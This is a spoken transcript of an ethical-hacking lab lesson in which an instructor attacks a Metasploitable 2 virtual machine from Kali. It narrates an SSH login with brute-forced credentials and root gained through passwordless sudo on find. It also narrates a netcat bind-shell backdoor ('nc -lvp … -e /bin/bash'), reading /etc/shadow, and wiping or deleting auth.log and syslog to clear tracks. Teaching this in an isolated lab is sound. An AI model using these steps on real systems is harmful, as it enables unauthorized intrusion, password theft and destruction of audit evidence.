Bismillahirrahmanirrahim. So in this lab demonstration, I will show you about the gaining access, unauthorized gaining access, then privilege escalation, then maintaining access, and clearing the tracks. So for this lab demonstration, two systems are used. One is Metasploitable 2 and other one is Kali. The network adapter I have selected is host only adapter. I use two adapters for the Kali. The first adapter is NAT and the second adapter is in host only adapter, but we are going to use only the host only adapter, this IP address for this lab session. So using the ifconfig command, find the IP address for the Kali and the IP address for the Metasploitable 2 framework. So now the first step, the attacker would connect with the Metasploitable 2 using the SSH service. So in this lab, okay, so he is going to connect with the target system using the SSH service. So paste the selection and find what is the IP address of the Metasploitable 1.10. So accordingly, .10. Okay, so other things. So we are going to use the msfadmin account in a real situation. For example, the attacker would find some account with an organization using social engineering attack or some other way of footprinting. Okay, he would try to find some account like some account from the organization, and he would try to figure out the password using the brute force attack. Okay, let us assume the attacker has found such account msfadmin in the target system, and he has figured out the password using the brute force attack for the SSH service using Medusa or Hydra tools. Okay, so he's trying to connect with the target system. So the password is msfadmin. So now through the SSH service, the attacker is able to log in into the target system using SSH service. So now if you execute the OMI command, okay, the user is msfadmin. Okay, so now the attacker would try to escalate his or her privilege from msfadmin. The focus of the attacker is to get the root access. Okay, so to find the root access, there are many options are available. One of the option is if the target system is a Linux system, okay, and if there is misconfiguration with the sudo command, then that could be utilized to initiate the attack, and through that attack the root shell can be obtained. Okay, so first let's execute this command sudo l msfadmin, and you can see that all okay, so it is giving that there might be a vulnerability that okay, when this particular user execute the sudo command, while executing the sudo command, there is a vulnerability. Through that vulnerability, the attacker can obtain the root shell script. Okay, to verify this, okay, so we have to use some tools like one of the tool is linenum.sh. So if you don't have this linenum.sh, okay, but you have to go to the OneDrive, okay, and in that you can find Metasploitable 2 framework for enumeration. Okay, so in that, if you download, you can find the linenum.sh. Then you can execute this linenum.sh. So linenum.sh, okay, pipe, then more command. So this linenum.sh is a shell script. It would scan the entire Linux system and give us the vulnerabilities, various vulnerabilities through which we can initiate the attack. So you can see that it is also giving us the information about the kernel. Okay, what is the version of the kernel? Okay, so this like when you know what is a kernel version, you can go to the exploitdb.com and you can search the exploit for this particular kernel, and then you can download that exploit and execute to get the root shell. So this is another option, but we are going to use the sudo, the vulnerability with the sudo command. Okay. So you can see that it is giving a lot of information. Okay, what are the different user accounts, user ID for each and every account, group details. Okay, so what are the contents of the etc password? Okay, so this is what we want actually. We have confirmed that there is a vulnerability with the sudo command. So it says that when the particular user like msfadmin execute the sudo, the user need not um, uh, supply the password. So it is an vulnerability actually. So if this vulnerability is found, then what we can do is, like, it is easy for us to get the root shell. Okay. And so you can see a lot of other informations, but now our focus is on the sudo. So I just and also here you can notice that cron job. So here also you can initiate the attack on the cron job vulnerability and you can get the root shell. So these are the networking informations. Okay, TCP and UDP, and what are the different services that are running. Okay, so now we will just start the attack process. So once you find that weakness with the sudo, that there is no need for any password, then what you have to do is go to this site gtfobins.github.io. Okay, then /#find. Okay, so just go to this link and just type find. So just select the find. Under the find, you go to the sudo. So if the binary is allowed to run as a super user by the sudo, It doesn't drop the elevated privilege and may be used to access the file system, escalate or maintain privilege access. So what it is telling is, if you execute this command, then okay, so when you are executing this command, what happens? The privilege escalates to the root, and that privilege doesn't drop, it stays there. So the administrator privilege or the root privilege, okay, we are able to obtain by executing this statement. Okay, so you can skip this dash quit part, just copy this. Okay, and now please remember, we are not in the directly accessing the Metasploitable 2 because that is a victim. So we have connected from the Kali to the Metasploitable 2 using the shell. Okay, now what I am going to do is I'm just going to put this command which we got from the gto bins.github. So before I execute, once again, let me execute this statement. Oh, am I? You can see msfadmin. Now let me paste this. Okay, now you can see that the shell prompt has changed. So let me give who am I. So now we got the root access. So this is called privilege escalation, and also in the privilege escalation there are many categories, and this particular privilege escalation is called vertical privilege escalation. Why? Because from ordinary user, okay, the MSF admin, we have escalated our privilege to the root level. So this is called vertical. Suppose let's say there are two users, Tom and Jerry, both are not root users. Okay, so from the Tom account, the attacker is able to switch over to the Jerry account. Then it's called horizontal escalation. But what we have done here is called vertical escalation. Okay, so now once you get the root access, we can do many things. Okay, so next task is to start the maintaining access process. Okay, so to do the maintaining access, so what I'm going to do is I am going to put a backdoor in the target. Okay, so add the netcat listener to the uh, so no, just don't go there. Okay, so what we are going to do is this. So we are going to run this, okay, in the Metasploitable framework. Metasploitable 2. Okay, we are deploying a listener. Okay, so this one, let's put it in the Metasploitable 2. netcat dash lvp. Okay, local port, V for verbose and P for the port. Okay, then the port is some number. Okay, let's give okay something like 888 or something. Dash E. Okay, the shell what. So dash E slash bin slash bash slash bin slash bash. Okay, oh, I'm making a mistake because we shouldn't go there because we have the access to the Metasploitable 2 from the Kali. Okay, the Metasploitable 2 is the victim, so we are accessing the Metasploitable 2 from the Kali. So we got the root shell in of the Metasploitable 2 in the Kali itself. So we have to execute here netcat. So it doesn't mean that this statement, this listener is going to run in the Kali. This is the terminal of the Metasploitable 2. Okay, we are accessing from the Kali. So nc dash lvp. Okay, so some port numbers. Okay, dash e dash bin dash bash. Okay, so you can see that we have put a backdoor in the Kali, and that is listening on the port number 8888. Okay, sorry, backdoor on the Metasploitable 2, and it is listening on the port number 888. Okay, so that's fine. So from the Kali, I'm opening okay, a new terminal. So I'm just trying to connect with the backdoor netcat. Okay, then 192.168. Okay, then 1.10. The port number is 88. Okay. So now you can see I'm successfully connected. Okay, if you check the Metasploitable terminal, which we are accessing from the Kali, okay, you see that there is a connection from 1.7, and this okay has come and it has been accepted. So now we see that we are able to connect to the Metasploitable 2 using the this backdoor. Okay, so this is the backdoor we have installed in the target nc-lvp, the support number. Okay, so we are getting the root access, and now using this backdoor I can access cat slash etc. Okay, shadow. Okay, so you can see you can steal the password and whatever you want you can do it. So now this is the best example, okay, that demonstrates the maintaining access. So to maintain the access, we are um, putting a backdoor in the target system. So in one more thing, like if the Metasploitable 2 is shut down, okay, then again you have to connect to the SSH, then you have to do the privilege escalation, and then again through the root access you have to deploy the backdoor. So many things you have to do again, right? So for that you can do something called automation. So you can do the automation using cron job, okay? But now, as of now, you would have understood so far what is gaining access, then what is privilege escalation, vertical privilege escalation. Then I demonstrated you the maintaining access by creating a backdoor. Now let's see the next thing, that is clearing the tracks. Okay. So regarding clearing the tracks, okay, let me show you. You have to um, go to this folder cd var log, cd var log. Okay, if you put ls, you can see so many log files here. These are related to mail, PostgreSQL. This is related to Samba. This is related to MySQL. Okay, then this is for FTP. Okay, so many log files are available. Okay, so we are particular about uh, these log files. Okay, so this is the command ls-leah to list all the log files. Okay, then if you want to see a specific log file, okay, this log file is related to authentication. Okay, this log file is related to the system logs. Okay, so let's see that. So cat authentication.log. You can see that which user has logged in at what. Okay, so all such informations are available. Okay, you can see this msfadmin. Okay, so has executed this bin.sh and he has got the root access. Okay, session open for the user root by msfadmin. So all these informations are coming here. Okay. And similarly, cat syslog. Okay, you can find the information about the system log. Okay, so like DHCP pack of 192.1 from 192.1.2. Okay, so these are the contents of the syslog. So O lost B, user login records. Okay, so now we come to this part, clearing the log files. So how to clear the log files? For example, let's take authentication.log. Okay, so if you execute this command, so all the contents of the authentication log would be lost. So if you put like echo double quotes space double quotes, then empty content would be occupying the authentication.log file and all the data would be lost. Okay, so let's try to do this stuff here. Echo, okay, then dash greater than authentication.log. Okay, then now I type cat authentication.log, and now you can see that authentication log is empty. Okay, so this is a good example of clearing the tracks. Okay, and then similarly you can do the same thing for syslog. Okay, then okay, so this is the mandatory things. So other optional things, these are optional things, these are not mandatory. Like delete the log files. If you want to delete the log files, okay, rm, then the entire log file would be deleted. Okay, remove authentication.log. Similarly, space syslog. So both authentication log and syslog would be deleted. Or if you want, you can do it separately also. Then other options, instead of clearing the entire file, attackers can remove a specific line. For example, you want to remove a specific line. Okay, instead of removing, here what we are doing is uh, the file would be existing, but the contents of the file we are making null. And in the second option, what we are doing, we are removing the entire file using the rm command. The third option is inside the log file, if you want to remove a specific line, okay, then you can use this approach. Okay, So you have to like use a vi command. Okay, for example, vi command, va, and put slash. So if you put the slash, that means you are searching for a specific term in the entire file. So that is the specific term. Okay, then you can do these things. Okay, so you have to be very strong in the va tool, but these are optional things in case um, you want to do more things. Okay, but these are not mandatory. Okay, so after you clear the log things, okay, you can execute the cat command and see the whether the files are cleared or not. Okay, so in this lab session demonstration, you have seen what is privilege escalation, then maintaining access, gaining access, maintaining access, and clearing the tracks. Okay, thank you very much.